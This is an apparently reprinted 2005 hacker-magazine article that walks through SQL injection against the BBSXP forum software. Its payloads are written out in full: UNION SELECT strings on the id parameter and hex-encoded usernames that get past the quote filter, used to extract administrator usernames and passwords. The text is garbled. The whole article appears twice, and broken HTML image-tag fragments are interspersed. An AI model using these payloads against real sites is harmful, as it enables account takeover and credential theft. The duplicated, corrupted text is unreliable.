Note: This article has been published in the 6th issue of "Hacker X Archives" in 2005. The copyright belongs to it. Please keep the article complete and indicate the copyright when reprinting.
The BBSXP forum has been said to be not at all calm recently. The loopholes burst out one after another. After the last time, the vulnerability of this file was analyzed, not long after, another vulnerability broke out. So I, a rookie, can no longer calm down. Don’t wait for others to find loopholes for us every time. Let’s analyze it myself.
First, let's review the vulnerabilities and remember that the order variable was filtered by HTMLncode before being executed in SQL statements. Let’s take a look at the vulnerabilities:
id=HTMLEncode(Request("id"))
if id<>"" then
sql="select * from [calendar] where order by id Desc"
The id variable is also filtered by HTMLEncode and put into SQL statements. The method used is to construct a special id variable and use UNION query to break the password out.
Tips: Basic introduction to UNION query
When using UNION, the system will automatically remove duplicate records. The number of columns in each result table participating in the UNION operation must be the same; the data types of the corresponding items must also be the same;
select top 1 username,userpass from [user] union select test,12345 from [clubconfig]
——A single quote mark is added here to indicate that the data inside is character type, in order to match the type pair of username and userpass (there are no such strict requirements in ACCESS. If the data types are inconsistent, it will not cause SQL statement errors). The results of the execution in the database operation of Ocean 2006 are as follows (Figure 1):
-461) (/Article/UploadFiles/200507/);" src="/college/UploadPic/2006/8/27/" width=564 onload="if(>-460)=-460" border=0>
Principle learning and analysis
After understanding the union query, we can construct this id. For example: id=-1 union select 1,2,3,4,5,6,7 from [user] where membercode=5
Restore the complete SQL statement like this:
select * from [calendar] where id=-1 union select 1,2,3,4,5,6,7 from [user] where membercode=5 order by id Desc
The first half of this SQL will not be able to find anything because of id=-1. Then, the 7 numbers 1 to 7 are because there are 7 fields in the calendar table. Then you can see the results as shown in the picture. (Figure 2)
-461) (/Article/UploadFiles/200507/);" src="/college/UploadPic/2006/8/27/" width=564 onload="if(>-460)=-460" border=0>
The numbers that can be displayed (such as 3 and 4) can be changed to the field names username and userpass. Because there is a membercode=5 condition, you can find out the username and password of the community district mayor level. (Figure 3) Of course, it is also easy to check the password of a specific user, just use username as a restriction. However, it should be noted that the HTMLEncode function filters single quotes, so it needs to be converted in hexadecimal. Change the statement to:
id=-1 union select 1,2,userpass,4,5,6,7 from [user] where username=0xD3C3BBA7
Among them, 0xD3C3BBA7 is the hexadecimal writing method of "user". If it is a number and English, remember that each character needs to be represented by four bytes, such as "1" to be written as 0x3100. This is the same as last time. One difference is that last time we used DECLARE @cmd sysname and converted the spaces to the "+" sign. Later, after practice, it was found that it was unnecessary. So let me give it a special mention.
The BBSXP forum has been said to be not at all calm recently. The loopholes burst out one after another. After the last time, the vulnerability of this file was analyzed, not long after, another vulnerability broke out. So I, a rookie, can no longer calm down. Don’t wait for others to find loopholes for us every time. Let’s analyze it myself.
First, let's review the vulnerabilities and remember that the order variable was filtered by HTMLncode before being executed in SQL statements. Let’s take a look at the vulnerabilities:
id=HTMLEncode(Request("id"))
if id<>"" then
sql="select * from [calendar] where order by id Desc"
The id variable is also filtered by HTMLEncode and put into SQL statements. The method used is to construct a special id variable and use UNION query to break the password out.
Tips: Basic introduction to UNION query
When using UNION, the system will automatically remove duplicate records. The number of columns in each result table participating in the UNION operation must be the same; the data types of the corresponding items must also be the same;
select top 1 username,userpass from [user] union select test,12345 from [clubconfig]
——A single quote mark is added here to indicate that the data inside is character type, in order to match the type pair of username and userpass (there are no such strict requirements in ACCESS. If the data types are inconsistent, it will not cause SQL statement errors). The results of the execution in the database operation of Ocean 2006 are as follows (Figure 1):
-461) (/Article/UploadFiles/200507/);" src="/college/UploadPic/2006/8/27/" width=564 onload="if(>-460)=-460" border=0>
Principle learning and analysis
After understanding the union query, we can construct this id. For example: id=-1 union select 1,2,3,4,5,6,7 from [user] where membercode=5
Restore the complete SQL statement like this:
select * from [calendar] where id=-1 union select 1,2,3,4,5,6,7 from [user] where membercode=5 order by id Desc
The first half of this SQL will not be able to find anything because of id=-1. Then, the 7 numbers 1 to 7 are because there are 7 fields in the calendar table. Then you can see the results as shown in the picture. (Figure 2)
-461) (/Article/UploadFiles/200507/);" src="/college/UploadPic/2006/8/27/" width=564 onload="if(>-460)=-460" border=0>
The numbers that can be displayed (such as 3 and 4) can be changed to the field names username and userpass. Because there is a membercode=5 condition, you can find out the username and password of the community district mayor level. (Figure 3) Of course, it is also easy to check the password of a specific user, just use username as a restriction. However, it should be noted that the HTMLEncode function filters single quotes, so it needs to be converted in hexadecimal. Change the statement to:
id=-1 union select 1,2,userpass,4,5,6,7 from [user] where username=0xD3C3BBA7
Among them, 0xD3C3BBA7 is the hexadecimal writing method of "user". If it is a number and English, remember that each character needs to be represented by four bytes, such as "1" to be written as 0x3100. This is the same as last time. One difference is that last time we used DECLARE @cmd sysname and converted the spaces to the "+" sign. Later, after practice, it was found that it was unnecessary. So let me give it a special mention.